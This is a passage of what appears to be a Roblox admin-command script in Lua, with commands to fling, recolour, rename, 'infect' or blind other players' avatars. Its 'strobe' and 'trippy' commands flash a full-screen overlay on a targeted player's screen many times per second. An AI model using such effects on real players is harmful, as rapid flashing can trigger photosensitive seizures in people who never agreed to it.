  5303. 1768.for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor = BrickColor.new("Bright green") if part.Name == "FAKETORSO" then part:Destroy() end elseif part:findFirstChild("NameTag") then part.Head.BrickColor = BrickColor.new("Bright green") end end
  5304.  
  5305.  
  5306. 1769.end
  5307.  
  5308.  
  5309. 1770.end))
  5310.  
  5311.  
  5312. 1771.end
  5313.  
  5314.  
  5315. 1772.end
  5316.  
  5317.  
  5318. 1773.
  5319.  
  5320.  
  5321. 1774.if msg:lower():sub(1,10) == "uncreeper " then
  5322.  
  5323.  
  5324. 1775.local plrz = GetPlr(plr, msg:lower():sub(11))
  5325.  
  5326.  
  5327. 1776.for i, v in pairs(plrz) do
  5328.  
  5329.  
  5330. 1777.coroutine.resume(coroutine.create(function()
  5331.  
  5332.  
  5333. 1778.if v and v.Character and v.Character:findFirstChild("Torso") then
  5334.  
  5335.  
  5336. 1779.if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  5337.  
  5338.  
  5339. 1780.if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  5340.  
  5341.  
  5342. 1781.v.Character.Torso.Transparency = 0
  5343.  
  5344.  
  5345. 1782.v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  5346.  
  5347.  
  5348. 1783.v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  5349.  
  5350.  
  5351. 1784.v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  5352.  
  5353.  
  5354. 1785.v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  5355.  
  5356.  
  5357. 1786.v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  5358.  
  5359.  
  5360. 1787.for a, part in pairs(v.Character:children()) do if part:IsA("BasePart") then part.BrickColor = BrickColor.new("White") if part.Name == "FAKETORSO" then part:Destroy() end elseif part:findFirstChild("NameTag") then part.Head.BrickColor = BrickColor.new("White") end end
  5361.  
  5362.  
  5363. 1788.end
  5364.  
  5365.  
  5366. 1789.end))
  5367.  
  5368.  
  5369. 1790.end
  5370.  
  5371.  
  5372. 1791.end
  5373.  
  5374.  
  5375. 1792.
  5376.  
  5377.  
  5378. 1793.if msg:lower():sub(1,8) == "bighead " then
  5379.  
  5380.  
  5381. 1794.local plrz = GetPlr(plr, msg:lower():sub(9))
  5382.  
  5383.  
  5384. 1795.for i, v in pairs(plrz) do
  5385.  
  5386.  
  5387. 1796.coroutine.resume(coroutine.create(function()
  5388.  
  5389.  
  5390. 1797.if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(3,3,3) v.Character.Torso.Neck.C0 = CFrame.new(0,1.9,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  5391.  
  5392.  
  5393. 1798.end))
  5394.  
  5395.  
  5396. 1799.end
  5397.  
  5398.  
  5399. 1800.end
  5400.  
  5401.  
  5402. 1801.
  5403.  
  5404.  
  5405. 1802.if msg:lower():sub(1,9) == "minihead " then
  5406.  
  5407.  
  5408. 1803.local plrz = GetPlr(plr, msg:lower():sub(10))
  5409.  
  5410.  
  5411. 1804.for i, v in pairs(plrz) do
  5412.  
  5413.  
  5414. 1805.coroutine.resume(coroutine.create(function()
  5415.  
  5416.  
  5417. 1806.if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(.75,.75,.75) v.Character.Torso.Neck.C0 = CFrame.new(0,.8,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  5418.  
  5419.  
  5420. 1807.end))
  5421.  
  5422.  
  5423. 1808.end
  5424.  
  5425.  
  5426. 1809.end
  5427.  
  5428.  
  5429. 1810.
  5430.  
  5431.  
  5432. 1811.if msg:lower():sub(1,6) == "fling " then
  5433.  
  5434.  
  5435. 1812.local plrz = GetPlr(plr, msg:lower():sub(7))
  5436.  
  5437.  
  5438. 1813.for i, v in pairs(plrz) do
  5439.  
  5440.  
  5441. 1814.coroutine.resume(coroutine.create(function()
  5442.  
  5443.  
  5444. 1815.if v and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  5445.  
  5446.  
  5447. 1816.local xran local zran
  5448.  
  5449.  
  5450. 1817.repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  5451.  
  5452.  
  5453. 1818.repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  5454.  
  5455.  
  5456. 1819.v.Character.Humanoid.Sit = true v.Character.Torso.Velocity = Vector3.new(0,0,0)
  5457.  
  5458.  
  5459. 1820.local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  5460.  
  5461.  
  5462. 1821.end
  5463.  
  5464.  
  5465. 1822.end))
  5466.  
  5467.  
  5468. 1823.end
  5469.  
  5470.  
  5471. 1824.end
  5472.  
  5473.  
  5474. 1825.
  5475.  
  5476.  
  5477. 1826.if msg:lower():sub(1,8) == "seizure " then
  5478.  
  5479.  
  5480. 1827.local plrz = GetPlr(plr, msg:lower():sub(9))
  5481.  
  5482.  
  5483. 1828.for i, v in pairs(plrz) do
  5484.  
  5485.  
  5486. 1829.coroutine.resume(coroutine.create(function()
  5487.  
  5488.  
  5489. 1830.if v and v.Character then
  5490.  
  5491.  
  5492. 1831.v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(math.rad(90),0,0)
  5493.  
  5494.  
  5495. 1832.local cl = script.ScriptBase:Clone() cl.Name = "SeizureBase" cl.Code.Value = [[repeat wait() script.Parent.Humanoid.PlatformStand = true script.Parent.Torso.Velocity = Vector3.new(math.random(-10,10),-5,math.random(-10,10)) script.Parent.Torso.RotVelocity = Vector3.new(math.random(-5,5),math.random(-5,5),math.random(-5,5)) until nil]]
  5496.  
  5497.  
  5498. 1833.table.insert(objects, cl) cl.Parent = v.Character cl.Disabled = false
  5499.  
  5500.  
  5501. 1834.end
  5502.  
  5503.  
  5504. 1835.end))
  5505.  
  5506.  
  5507. 1836.end
  5508.  
  5509.  
  5510. 1837.end
  5511.  
  5512.  
  5513. 1838.
  5514.  
  5515.  
  5516. 1839.if msg:lower():sub(1,10) == "unseizure " then
  5517.  
  5518.  
  5519. 1840.local plrz = GetPlr(plr, msg:lower():sub(11))
  5520.  
  5521.  
  5522. 1841.for i, v in pairs(plrz) do
  5523.  
  5524.  
  5525. 1842.coroutine.resume(coroutine.create(function()
  5526.  
  5527.  
  5528. 1843.if v and v.Character then
  5529.  
  5530.  
  5531. 1844.for i,v in pairs(v.Character:children()) do if v.Name == "SeizureBase" then v:Destroy() end end
  5532.  
  5533.  
  5534. 1845.wait(.1) v.Character.Humanoid.PlatformStand = false
  5535.  
  5536.  
  5537. 1846.end
  5538.  
  5539.  
  5540. 1847.end))
  5541.  
  5542.  
  5543. 1848.end
  5544.  
  5545.  
  5546. 1849.end
  5547.  
  5548.  
  5549. 1850.
  5550.  
  5551.  
  5552. 1851.if msg:lower():sub(1,12) == "removelimbs " then
  5553.  
  5554.  
  5555. 1852.local plrz = GetPlr(plr, msg:lower():sub(13))
  5556.  
  5557.  
  5558. 1853.for i, v in pairs(plrz) do
  5559.  
  5560.  
  5561. 1854.coroutine.resume(coroutine.create(function()
  5562.  
  5563.  
  5564. 1855.if v and v.Character then
  5565.  
  5566.  
  5567. 1856.for a, obj in pairs(v.Character:children()) do
  5568.  
  5569.  
  5570. 1857.if obj:IsA("BasePart") and (obj.Name:find("Leg") or obj.Name:find("Arm")) then obj:Destroy() end
  5571.  
  5572.  
  5573. 1858.end
  5574.  
  5575.  
  5576. 1859.end
  5577.  
  5578.  
  5579. 1860.end))
  5580.  
  5581.  
  5582. 1861.end
  5583.  
  5584.  
  5585. 1862.end
  5586.  
  5587.  
  5588. 1863.
  5589.  
  5590.  
  5591. 1864.if msg:lower():sub(1,5) == "name " then
  5592.  
  5593.  
  5594. 1865.local chk1 = msg:lower():sub(6):find(" ") + 5
  5595.  
  5596.  
  5597. 1866.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  5598.  
  5599.  
  5600. 1867.for i, v in pairs(plrz) do
  5601.  
  5602.  
  5603. 1868.coroutine.resume(coroutine.create(function()
  5604.  
  5605.  
  5606. 1869.if v and v.Character and v.Character:findFirstChild("Head") then
  5607.  
  5608.  
  5609. 1870.for a, mod in pairs(v.Character:children()) do if mod:findFirstChild("NameTag") then v.Character.Head.Transparency = 0 mod:Destroy() end end
  5610.  
  5611.  
  5612. 1871.local char = v.Character
  5613.  
  5614.  
  5615. 1872.local mod = Instance.new("Model", char) mod.Name = msg:sub(chk1+1)
  5616.  
  5617.  
  5618. 1873.local cl = char.Head:Clone() cl.Parent = mod local hum = Instance.new("Humanoid", mod) hum.Name = "NameTag" hum.MaxHealth = 0 hum.Health = 0
  5619.  
  5620.  
  5621. 1874.local weld = Instance.new("Weld", cl) weld.Part0 = cl weld.Part1 = char.Head
  5622.  
  5623.  
  5624. 1875.char.Head.Transparency = 1
  5625.  
  5626.  
  5627. 1876.end
  5628.  
  5629.  
  5630. 1877.end))
  5631.  
  5632.  
  5633. 1878.end
  5634.  
  5635.  
  5636. 1879.end
  5637.  
  5638.  
  5639. 1880.
  5640.  
  5641.  
  5642. 1881.if msg:lower():sub(1,7) == "unname " then
  5643.  
  5644.  
  5645. 1882.local plrz = GetPlr(plr, msg:lower():sub(8))
  5646.  
  5647.  
  5648. 1883.for i, v in pairs(plrz) do
  5649.  
  5650.  
  5651. 1884.coroutine.resume(coroutine.create(function()
  5652.  
  5653.  
  5654. 1885.if v and v.Character and v.Character:findFirstChild("Head") then
  5655.  
  5656.  
  5657. 1886.for a, mod in pairs(v.Character:children()) do if mod:findFirstChild("NameTag") then v.Character.Head.Transparency = 0 mod:Destroy() end end
  5658.  
  5659.  
  5660. 1887.end
  5661.  
  5662.  
  5663. 1888.end))
  5664.  
  5665.  
  5666. 1889.end
  5667.  
  5668.  
  5669. 1890.end
  5670.  
  5671.  
  5672. 1891.
  5673.  
  5674.  
  5675. 1892.if msg:lower():sub(1,5) == "char " then
  5676.  
  5677.  
  5678. 1893.local chk1 = msg:lower():sub(6):find(" ") + 5
  5679.  
  5680.  
  5681. 1894.local plrz = GetPlr(plr, msg:lower():sub(6,chk1-1))
  5682.  
  5683.  
  5684. 1895.for i, v in pairs(plrz) do
  5685.  
  5686.  
  5687. 1896.coroutine.resume(coroutine.create(function()
  5688.  
  5689.  
  5690. 1897.if v and v.Character then
  5691.  
  5692.  
  5693. 1898.v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. msg:sub(chk1+1)
  5694.  
  5695.  
  5696. 1899.v:LoadCharacter()
  5697.  
  5698.  
  5699. 1900.end
  5700.  
  5701.  
  5702. 1901.end))
  5703.  
  5704.  
  5705. 1902.end
  5706.  
  5707.  
  5708. 1903.end
  5709.  
  5710.  
  5711. 1904.
  5712.  
  5713.  
  5714. 1905.if msg:lower():sub(1,7) == "unchar " then
  5715.  
  5716.  
  5717. 1906.local plrz = GetPlr(plr, msg:lower():sub(8))
  5718.  
  5719.  
  5720. 1907.for i, v in pairs(plrz) do
  5721.  
  5722.  
  5723. 1908.coroutine.resume(coroutine.create(function()
  5724.  
  5725.  
  5726. 1909.if v and v.Character then
  5727.  
  5728.  
  5729. 1910.v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. v.userId
  5730.  
  5731.  
  5732. 1911.v:LoadCharacter()
  5733.  
  5734.  
  5735. 1912.end
  5736.  
  5737.  
  5738. 1913.end))
  5739.  
  5740.  
  5741. 1914.end
  5742.  
  5743.  
  5744. 1915.end
  5745.  
  5746.  
  5747. 1916.
  5748.  
  5749.  
  5750. 1917.if msg:lower():sub(1,7) == "infect " then
  5751.  
  5752.  
  5753. 1918.local plrz = GetPlr(plr, msg:lower():sub(8))
  5754.  
  5755.  
  5756. 1919.for i, v in pairs(plrz) do
  5757.  
  5758.  
  5759. 1920.coroutine.resume(coroutine.create(function()
  5760.  
  5761.  
  5762. 1921.if v and v.Character then
  5763.  
  5764.  
  5765. 1922.Infect(v.Character)
  5766.  
  5767.  
  5768. 1923.end
  5769.  
  5770.  
  5771. 1924.end))
  5772.  
  5773.  
  5774. 1925.end
  5775.  
  5776.  
  5777. 1926.end
  5778.  
  5779.  
  5780. 1927.
  5781.  
  5782.  
  5783. 1928.if msg:lower():sub(1,11) == "rainbowify " then
  5784.  
  5785.  
  5786. 1929.local plrz = GetPlr(plr, msg:lower():sub(12))
  5787.  
  5788.  
  5789. 1930.for i, v in pairs(plrz) do
  5790.  
  5791.  
  5792. 1931.coroutine.resume(coroutine.create(function()
  5793.  
  5794.  
  5795. 1932.if v and v.Character and v.Character:findFirstChild("Torso") then
  5796.  
  5797.  
  5798. 1933.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  5799.  
  5800.  
  5801. 1934.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  5802.  
  5803.  
  5804. 1935.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  5805.  
  5806.  
  5807. 1936.local cl = script.ScriptBase:Clone() cl.Name = "ify" cl.Code.Value = [[repeat wait(1/44) local clr = BrickColor.random() for i, v in pairs(script.Parent:children()) do if v:IsA("BasePart") and (v.Name ~= "Head" or not v.Parent:findFirstChild("NameTag", true)) then v.BrickColor = clr v.Reflectance = 0 v.Transparency = 0 elseif v:findFirstChild("NameTag") then v.Head.BrickColor = clr v.Head.Reflectance = 0 v.Head.Transparency = 0 v.Parent.Head.Transparency = 1 end end until nil]]
  5808.  
  5809.  
  5810. 1937.cl.Parent = v.Character cl.Disabled = false
  5811.  
  5812.  
  5813. 1938.end
  5814.  
  5815.  
  5816. 1939.end))
  5817.  
  5818.  
  5819. 1940.end
  5820.  
  5821.  
  5822. 1941.end
  5823.  
  5824.  
  5825. 1942.
  5826.  
  5827.  
  5828. 1943.if msg:lower():sub(1,9) == "flashify " then
  5829.  
  5830.  
  5831. 1944.local plrz = GetPlr(plr, msg:lower():sub(10))
  5832.  
  5833.  
  5834. 1945.for i, v in pairs(plrz) do
  5835.  
  5836.  
  5837. 1946.coroutine.resume(coroutine.create(function()
  5838.  
  5839.  
  5840. 1947.if v and v.Character and v.Character:findFirstChild("Torso") then
  5841.  
  5842.  
  5843. 1948.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  5844.  
  5845.  
  5846. 1949.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  5847.  
  5848.  
  5849. 1950.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  5850.  
  5851.  
  5852. 1951.local cl = script.ScriptBase:Clone() cl.Name = "ify" cl.Code.Value = [[repeat wait(1/44) for i, v in pairs(script.Parent:children()) do if v:IsA("BasePart") and (v.Name ~= "Head" or not v.Parent:findFirstChild("NameTag", true)) then v.BrickColor = BrickColor.new("Institutional white") v.Reflectance = 0 v.Transparency = 0 elseif v:findFirstChild("NameTag") then v.Head.BrickColor = BrickColor.new("Institutional white") v.Head.Reflectance = 0 v.Head.Transparency = 0 v.Parent.Head.Transparency = 1 end end wait(1/44) for i, v in pairs(script.Parent:children()) do if v:IsA("BasePart") and (v.Name ~= "Head" or not v.Parent:findFirstChild("NameTag", true)) then v.BrickColor = BrickColor.new("Really black") v.Reflectance = 0 v.Transparency = 0 elseif v:findFirstChild("NameTag") then v.Head.BrickColor = BrickColor.new("Really black") v.Head.Reflectance = 0 v.Head.Transparency = 0 v.Parent.Head.Transparency = 1 end end until nil]]
  5853.  
  5854.  
  5855. 1952.cl.Parent = v.Character cl.Disabled = false
  5856.  
  5857.  
  5858. 1953.end
  5859.  
  5860.  
  5861. 1954.end))
  5862.  
  5863.  
  5864. 1955.end
  5865.  
  5866.  
  5867. 1956.end
  5868.  
  5869.  
  5870. 1957.
  5871.  
  5872.  
  5873. 1958.if msg:lower():sub(1,8) == "noobify " then
  5874.  
  5875.  
  5876. 1959.local plrz = GetPlr(plr, msg:lower():sub(9))
  5877.  
  5878.  
  5879. 1960.for i, v in pairs(plrz) do
  5880.  
  5881.  
  5882. 1961.coroutine.resume(coroutine.create(function()
  5883.  
  5884.  
  5885. 1962.if v and v.Character then
  5886.  
  5887.  
  5888. 1963.Noobify(v.Character)
  5889.  
  5890.  
  5891. 1964.end
  5892.  
  5893.  
  5894. 1965.end))
  5895.  
  5896.  
  5897. 1966.end
  5898.  
  5899.  
  5900. 1967.end
  5901.  
  5902.  
  5903. 1968.
  5904.  
  5905.  
  5906. 1969.if msg:lower():sub(1,9) == "ghostify " then
  5907.  
  5908.  
  5909. 1970.local plrz = GetPlr(plr, msg:lower():sub(10))
  5910.  
  5911.  
  5912. 1971.for i, v in pairs(plrz) do
  5913.  
  5914.  
  5915. 1972.coroutine.resume(coroutine.create(function()
  5916.  
  5917.  
  5918. 1973.if v and v.Character and v.Character:findFirstChild("Torso") then
  5919.  
  5920.  
  5921. 1974.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  5922.  
  5923.  
  5924. 1975.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  5925.  
  5926.  
  5927. 1976.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  5928.  
  5929.  
  5930. 1977.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  5931.  
  5932.  
  5933. 1978.prt.Transparency = .5 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("Institutional white")
  5934.  
  5935.  
  5936. 1979.if prt.Name:find("Leg") then prt.Transparency = 1 end
  5937.  
  5938.  
  5939. 1980.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = .5 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("Institutional white")
  5940.  
  5941.  
  5942. 1981.end end
  5943.  
  5944.  
  5945. 1982.end
  5946.  
  5947.  
  5948. 1983.end))
  5949.  
  5950.  
  5951. 1984.end
  5952.  
  5953.  
  5954. 1985.end
  5955.  
  5956.  
  5957. 1986.
  5958.  
  5959.  
  5960. 1987.if msg:lower():sub(1,8) == "goldify " then
  5961.  
  5962.  
  5963. 1988.local plrz = GetPlr(plr, msg:lower():sub(9))
  5964.  
  5965.  
  5966. 1989.for i, v in pairs(plrz) do
  5967.  
  5968.  
  5969. 1990.coroutine.resume(coroutine.create(function()
  5970.  
  5971.  
  5972. 1991.if v and v.Character and v.Character:findFirstChild("Torso") then
  5973.  
  5974.  
  5975. 1992.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  5976.  
  5977.  
  5978. 1993.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  5979.  
  5980.  
  5981. 1994.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  5982.  
  5983.  
  5984. 1995.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  5985.  
  5986.  
  5987. 1996.prt.Transparency = 0 prt.Reflectance = .4 prt.BrickColor = BrickColor.new("Bright yellow")
  5988.  
  5989.  
  5990. 1997.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = .4 prt.Head.BrickColor = BrickColor.new("Bright yellow")
  5991.  
  5992.  
  5993. 1998.end end
  5994.  
  5995.  
  5996. 1999.end
  5997.  
  5998.  
  5999. 2000.end))
  6000.  
  6001.  
  6002. 2001.end
  6003.  
  6004.  
  6005. 2002.end
  6006.  
  6007.  
  6008. 2003.
  6009.  
  6010.  
  6011. 2004.if msg:lower():sub(1,6) == "shiny " then
  6012.  
  6013.  
  6014. 2005.local plrz = GetPlr(plr, msg:lower():sub(7))
  6015.  
  6016.  
  6017. 2006.for i, v in pairs(plrz) do
  6018.  
  6019.  
  6020. 2007.coroutine.resume(coroutine.create(function()
  6021.  
  6022.  
  6023. 2008.if v and v.Character and v.Character:findFirstChild("Torso") then
  6024.  
  6025.  
  6026. 2009.if v.Character:findFirstChild("Shirt") then v.Character.Shirt.Parent = v.Character.Torso end
  6027.  
  6028.  
  6029. 2010.if v.Character:findFirstChild("Pants") then v.Character.Pants.Parent = v.Character.Torso end
  6030.  
  6031.  
  6032. 2011.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  6033.  
  6034.  
  6035. 2012.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  6036.  
  6037.  
  6038. 2013.prt.Transparency = 0 prt.Reflectance = 1 prt.BrickColor = BrickColor.new("Institutional white")
  6039.  
  6040.  
  6041. 2014.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 1 prt.Head.BrickColor = BrickColor.new("Institutional white")
  6042.  
  6043.  
  6044. 2015.end end
  6045.  
  6046.  
  6047. 2016.end
  6048.  
  6049.  
  6050. 2017.end))
  6051.  
  6052.  
  6053. 2018.end
  6054.  
  6055.  
  6056. 2019.end
  6057.  
  6058.  
  6059. 2020.
  6060.  
  6061.  
  6062. 2021.if msg:lower():sub(1,7) == "normal " then
  6063.  
  6064.  
  6065. 2022.local plrz = GetPlr(plr, msg:lower():sub(8))
  6066.  
  6067.  
  6068. 2023.for i, v in pairs(plrz) do
  6069.  
  6070.  
  6071. 2024.coroutine.resume(coroutine.create(function()
  6072.  
  6073.  
  6074. 2025.if v and v.Character and v.Character:findFirstChild("Torso") then
  6075.  
  6076.  
  6077. 2026.if v.Character:findFirstChild("Head") then v.Character.Head.Mesh.Scale = Vector3.new(1.25,1.25,1.25) end
  6078.  
  6079.  
  6080. 2027.if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  6081.  
  6082.  
  6083. 2028.if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  6084.  
  6085.  
  6086. 2029.v.Character.Torso.Transparency = 0
  6087.  
  6088.  
  6089. 2030.v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  6090.  
  6091.  
  6092. 2031.v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  6093.  
  6094.  
  6095. 2032.v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  6096.  
  6097.  
  6098. 2033.v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  6099.  
  6100.  
  6101. 2034.v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  6102.  
  6103.  
  6104. 2035.for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  6105.  
  6106.  
  6107. 2036.for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  6108.  
  6109.  
  6110. 2037.prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("White")
  6111.  
  6112.  
  6113. 2038.if prt.Name == "FAKETORSO" then prt:Destroy() end
  6114.  
  6115.  
  6116. 2039.elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("White")
  6117.  
  6118.  
  6119. 2040.end end
  6120.  
  6121.  
  6122. 2041.end
  6123.  
  6124.  
  6125. 2042.end))
  6126.  
  6127.  
  6128. 2043.end
  6129.  
  6130.  
  6131. 2044.end
  6132.  
  6133.  
  6134. 2045.
  6135.  
  6136.  
  6137. 2046.if msg:lower():sub(1,7) == "trippy " then
  6138.  
  6139.  
  6140. 2047.local plrz = GetPlr(plr, msg:lower():sub(8))
  6141.  
  6142.  
  6143. 2048.for i, v in pairs(plrz) do
  6144.  
  6145.  
  6146. 2049.coroutine.resume(coroutine.create(function()
  6147.  
  6148.  
  6149. 2050.if v and v:findFirstChild("PlayerGui") and not ChkAdmin(v.Name, false) then
  6150.  
  6151.  
  6152. 2051.for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  6153.  
  6154.  
  6155. 2052.local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUITRIPPY"
  6156.  
  6157.  
  6158. 2053.local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  6159.  
  6160.  
  6161. 2054.local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255) until nil]] cl.Parent = scr cl.Disabled = false
  6162.  
  6163.  
  6164. 2055.end
  6165.  
  6166.  
  6167. 2056.end))
  6168.  
  6169.  
  6170. 2057.end
  6171.  
  6172.  
  6173. 2058.end
  6174.  
  6175.  
  6176. 2059.
  6177.  
  6178.  
  6179. 2060.if msg:lower():sub(1,9) == "untrippy " then
  6180.  
  6181.  
  6182. 2061.local plrz = GetPlr(plr, msg:lower():sub(10))
  6183.  
  6184.  
  6185. 2062.for i, v in pairs(plrz) do
  6186.  
  6187.  
  6188. 2063.coroutine.resume(coroutine.create(function()
  6189.  
  6190.  
  6191. 2064.if v and v:findFirstChild("PlayerGui") then
  6192.  
  6193.  
  6194. 2065.for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUITRIPPY" then g:Destroy() end end
  6195.  
  6196.  
  6197. 2066.end
  6198.  
  6199.  
  6200. 2067.end))
  6201.  
  6202.  
  6203. 2068.end
  6204.  
  6205.  
  6206. 2069.end
  6207.  
  6208.  
  6209. 2070.
  6210.  
  6211.  
  6212. 2071.if msg:lower():sub(1,7) == "strobe " then
  6213.  
  6214.  
  6215. 2072.local plrz = GetPlr(plr, msg:lower():sub(8))
  6216.  
  6217.  
  6218. 2073.for i, v in pairs(plrz) do
  6219.  
  6220.  
  6221. 2074.coroutine.resume(coroutine.create(function()
  6222.  
  6223.  
  6224. 2075.if v and v:findFirstChild("PlayerGui") and not ChkAdmin(v.Name, false) then
  6225.  
  6226.  
  6227. 2076.for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  6228.  
  6229.  
  6230. 2077.local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUISTROBE"
  6231.  
  6232.  
  6233. 2078.local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  6234.  
  6235.  
  6236. 2079.local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(1,1,1) wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(0,0,0) until nil]] cl.Parent = scr cl.Disabled = false
  6237.  
  6238.  
  6239. 2080.end
  6240.  
  6241.  
  6242. 2081.end))
  6243.  
  6244.  
  6245. 2082.end
  6246.  
  6247.  
  6248. 2083.end
  6249.  
  6250.  
  6251. 2084.
  6252.  
  6253.  
  6254. 2085.if msg:lower():sub(1,9) == "unstrobe " then
  6255.  
  6256.  
  6257. 2086.local plrz = GetPlr(plr, msg:lower():sub(10))
  6258.  
  6259.  
  6260. 2087.for i, v in pairs(plrz) do
  6261.  
  6262.  
  6263. 2088.coroutine.resume(coroutine.create(function()
  6264.  
  6265.  
  6266. 2089.if v and v:findFirstChild("PlayerGui") then
  6267.  
  6268.  
  6269. 2090.for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUISTROBE" then g:Destroy() end end
  6270.  
  6271.  
  6272. 2091.end
  6273.  
  6274.  
  6275. 2092.end))
  6276.  
  6277.  
  6278. 2093.end
  6279.  
  6280.  
  6281. 2094.end
  6282.  
  6283.  
  6284. 2095.
  6285.  
  6286.  
  6287. 2096.if msg:lower():sub(1,6) == "blind " then
  6288.  
  6289.  
  6290. 2097.local plrz = GetPlr(plr, msg:lower():sub(7))
  6291.  
  6292.  
  6293. 2098.for i, v in pairs(plrz) do
  6294.  
  6295.  
  6296. 2099.coroutine.resume(coroutine.create(function()
  6297.  
  6298.  
  6299. 2100.if v and v:findFirstChild("PlayerGui") and not ChkAdmin(v.Name, false) then
  6300.  
  6301.  
  6302. 2101.for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  6303.  
  6304.  
  6305. 2102.local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUIBLIND"
  6306.  
  6307.  
